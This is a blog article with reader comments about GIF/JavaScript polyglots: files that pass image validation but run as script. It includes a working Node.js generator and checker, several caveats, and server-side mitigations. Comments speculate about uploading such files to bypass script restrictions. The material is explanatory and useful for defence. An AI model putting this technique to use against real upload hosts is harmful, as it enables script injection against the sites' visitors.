Hiding Executable Javascript in Images That Pass Validation

Here’s an interesting proof-of-concept that could be useful or hazardous depending on the situation in which you encounter it. [jklmnn] drew inspiration from the work of [Ange Albertini], who has documented a way to hide JavaScript within the header of a .gif file. The result is a polyglot: the file carries the complete script, and it is accepted as a valid image by a GIF decoder and as valid JavaScript by a script parser.

With a little bit of work, [jklmnn] boiled the concept down to its most basic parts so that it is easy to understand, then wrote a quick program to automate embedding the JavaScript. Grab the source code if you want to give it a try yourself.

Let’s get back to how this might be useful rather than harmful. What if you are working on a computer that doesn’t allow the browser to load JavaScript? You may be able to embed something useful, much like the hack that allowed movies to be played by abusing Microsoft Excel.
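To make the "valid to both parsers" claim concrete, here is an added example (my own code, not the article's, not jklmnn's generator and not Ange Albertini's files) that builds such a GIF/JavaScript polyglot in Node and then checks it with a small GIF block walker and with the JavaScript parser itself. The byte layout is my reconstruction of the width trick: the logical screen width is set to 0x2A2F (10799 pixels), whose little-endian bytes read as `/*`, so everything after the header is a block comment to a script engine, and the script is appended after the GIF trailer. The 1x1 image body, the `buildPolyglot`/`parseGif`/`runAsScript` names and the `sink` object are constructed for this example; whether jklmnn's tool uses exactly this layout is an assumption.

```javascript
"use strict";
// Added example: GIF/JavaScript polyglot builder plus both-sided checks.
//
// Byte layout (my reconstruction of the width trick, an assumption here):
//   "GIF89a"              signature, also a legal JavaScript identifier
//   0x2F 0x2A             logical screen width 10799 px, reads as "/*"
//   ...rest of the GIF... hidden inside the block comment
//   0x3B                  trailer; GIF decoders stop reading here
//   "*/=1;" payload "//"  closes the comment, completes "GIF89a=1;", runs payload

// Constructed minimal GIF body that follows the logical screen descriptor:
// a 2-entry global colour table, one 1x1 image frame (LZW codes for a
// single pixel of colour 0) and the trailer. None of these bytes form "*/".
const GIF_BODY = Buffer.from([
  0x00, 0x00, 0x00, 0xff, 0xff, 0xff, // global colour table: black, white
  0x2c, 0x00, 0x00, 0x00, 0x00,       // image descriptor at (0,0)
  0x01, 0x00, 0x01, 0x00, 0x00,       // 1x1 frame, no local colour table
  0x02, 0x02, 0x44, 0x01, 0x00,       // LZW min code size 2, one sub-block
  0x3b,                               // trailer
]);

function buildPolyglot(payload) {
  const lsd = Buffer.from([
    0x2f, 0x2a, // width 0x2A2F = 10799: the "/*" that hides the image bytes
    0x01, 0x00, // height 1
    0x80,       // packed field: global colour table present, 2 entries
    0x00, 0x00, // background colour index, pixel aspect ratio
  ]);
  const image = Buffer.concat([Buffer.from("GIF89a", "latin1"), lsd, GIF_BODY]);
  // The comment ends at the first "*/". Real LZW output or colour tables can
  // contain that pair by chance, so a generator must check for it.
  if (image.indexOf("*/", 0, "latin1") !== -1) {
    throw new Error("image bytes contain '*/'; the comment would end early");
  }
  const script = Buffer.from("*/=1;" + payload + "//", "latin1");
  return Buffer.concat([image, script]);
}

// Minimal GIF structure check: walk the blocks up to the trailer the way a
// decoder would. Everything after the trailer is ignored, which is exactly
// what lets the script ride along.
function parseGif(buf) {
  const sig = buf.toString("latin1", 0, 6);
  if (sig !== "GIF89a" && sig !== "GIF87a") throw new Error("not a GIF");
  const width = buf.readUInt16LE(6);
  const height = buf.readUInt16LE(8);
  const packed = buf[10];
  let pos = 13;
  if (packed & 0x80) pos += 3 * (1 << ((packed & 0x07) + 1)); // global colour table
  const skipSubBlocks = () => {
    for (;;) {
      if (pos >= buf.length) throw new Error("truncated sub-blocks");
      const n = buf[pos++];
      if (n === 0) return;
      pos += n;
    }
  };
  let frames = 0;
  for (;;) {
    if (pos >= buf.length) throw new Error("missing trailer");
    const b = buf[pos++];
    if (b === 0x3b) return { width, height, frames, trailerAt: pos - 1 };
    if (b === 0x2c) {                       // image descriptor
      const ipacked = buf[pos + 8];
      pos += 9;
      if (ipacked & 0x80) pos += 3 * (1 << ((ipacked & 0x07) + 1)); // local table
      pos += 1;                             // LZW minimum code size
      skipSubBlocks();
      frames++;
    } else if (b === 0x21) {                // extension: label + sub-blocks
      pos += 1;
      skipSubBlocks();
    } else {
      throw new Error(`unknown block 0x${b.toString(16)} at ${pos - 1}`);
    }
  }
}

// What <script src="x.gif"> does: parse the whole file as JavaScript. "GIF89a"
// is passed in as a parameter name so the "=1" assignment stays local here;
// in a browser it would create a global named GIF89a.
function runAsScript(buf, sink) {
  const src = buf.toString("latin1");
  return new Function("GIF89a", "sink", src)(undefined, sink);
}

const demo = buildPolyglot("sink.ran = true;");
const info = parseGif(demo);
const demoSink = {};
runAsScript(demo, demoSink);
console.log(`GIF ${info.width}x${info.height}, ${info.frames} frame, ` +
  `${demo.length - info.trailerAt - 1} byte(s) after trailer; payload ran: ${demoSink.ran}`);
```

Two caveats a practitioner would check before relying on this. First, the image side only holds for decoders that ignore bytes after the 0x3B trailer; a strict validator that requires the trailer to be the last byte rejects the file, and one that scans the whole file for the `*/` sequence inside LZW data is what the `indexOf` check above guards against. Second, the script side depends on the browser: the Fetch standard now blocks `<script>` loads whose response MIME type starts with `image/`, so the attack needs the file served with a non-image type (or an upload host that lets an attacker control `Content-Type`); the Chrome behaviour described in the comments below, a console warning only, is the older behaviour, and `X-Content-Type-Options: nosniff` plus a `script-src` that excludes user-upload origins are the server-side mitigations.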

18 thoughts on “Hiding Executable Javascript in Images That Pass Validation”

    1. I bet you people on this site who actually use NoScript add an exception for a few sites, upload this “image”, find some way to get it to run, and NoScript treats it as running from the site itself.

          1. Well, that should be the responsibility of the browser, but since many downloads or similar provide wrong MIME types they weakened that, and Chrome for example only shows a warning in the console if a wrong MIME type is provided.

  1. Funny how the linked site doesn’t work unless you enable scripting…

    Anyway, maybe this works on Facebook pages for Turkish or Syrian hackers to hack people. Or other popular sites/systems where people can make their own pages but the scripting is deliberately crippled.

    1. I apologize for that, though I’m not good at design, so I took a Bootstrap template and adapted it for my needs. I made another site completely using PHP and working without JavaScript, but it doesn’t really look good.
      JavaScript is a good technique for doing things locally (e.g. checking if the email input field contains an @ without needing to reload the site). But it has to be used carefully and safely.
